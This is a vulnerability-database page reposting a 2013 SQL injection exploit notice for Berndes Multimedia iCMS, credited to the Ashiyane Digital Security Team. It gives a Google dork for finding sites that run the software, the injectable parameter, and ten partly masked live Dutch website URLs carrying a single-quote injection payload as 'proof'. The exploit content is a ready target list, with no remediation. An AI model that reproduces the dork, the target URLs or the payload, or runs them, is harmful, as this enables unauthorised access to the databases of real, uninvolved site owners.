Berndes Multimedia iCMS Sql Injection Vulnerability

2013.09.13
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#| |-------------------------------------------------------------------------| | [/] Exploit Title: Berndes Multimedia iCMS Sql Injection Vulnerability | | [\] Exploit Author: Ashiyane Digital Security Team | | [/] Software Link : http://www.berndesmultimedia.nl | | [\] Google Dork: intext:"powered by Berndes Multimedia iCMS" | | [/] Tested on: Windows,Linux | | [\] Date : 2013/09/13 |-------------------------------------------------------------------------| | [\] Exploit: Sql Injection | [/] Location : [Target]l/default.id=[Sql Injection] |-------------------------------------------------------------------------| | [/] Proof: | | [\] http://www.asXi.nl/default.id=' | | [/] http://www.bX.nl/default.id=' | [\] http://www.batXs.nl/default.id=' | | [/] http://www.dgtomXransport.nl/default.id=' | | [\] http://www.fraai-Xten.nl/default.id=' | | [/] http://www.jongXerend.nl/default.id=' | | [\] http://www.viXng.nl/default.id=' | | [/] http://www.senXwijzer.nl/default.id=' | | [/] http://www.vrXd.nl/default.id=' | | [\] http://www.Xies.nl/default.id=' |-------------------------------------------------------------------------| | [/] Discovered By : ACC3SS |-------------------------------------------------------------------------| |-------------------------------------------------------------------------| |#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top